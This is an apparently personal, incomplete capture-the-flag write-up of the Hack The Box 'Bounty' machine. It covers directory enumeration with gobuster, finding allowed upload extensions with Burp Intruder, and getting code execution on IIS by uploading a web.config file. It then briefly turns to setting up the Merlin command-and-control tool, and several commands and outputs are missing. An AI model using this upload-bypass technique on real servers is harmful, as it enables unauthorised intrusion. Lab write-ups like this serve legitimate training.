Hack the box write-up: Bounty
Nmap result:
After the initial scan, I saw that only port 80 was open so I did the port scan
gobuster dir -u http://10.129.161.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx
It looks like it's unstable but I found transfer.aspx
File server found!
Let's test what extensions are allowed with burp
intercept > attach a file and upload > send it to repeater > observe the response
Make an extension list like this.
send it to intruder > clear $ > change payload name
go to payloads > payload options > load > select the file.
Start Attack
Only one of them had the content length of 1350, which was the config -> and it shows it was uploaded successfully.
Uploading Web.config files to IIS servers can bypass some security:
gobuster showed UploadedFiles directory.
Uploaded the web.config file and checked the file.
it's showing 3 so it's doing what the exploit is supposed to do.
ASP remote code Execution Template:
Since I confirmed that it allows code execution I'm going to use the merlin
Merlin is a tool like metasploit.
We need a server cert inside the merlin/data/509 directory.
To generate, execute the command:
After the server key is generated, run the program by typing "go run main.go"
For some reason, the box kept shutting down so I decided to stop working on it.
Full walkthrough is available from here: https://medium.com/@v1per/bounty-hackthebox-writeup-5b79a79e6de9
Last updated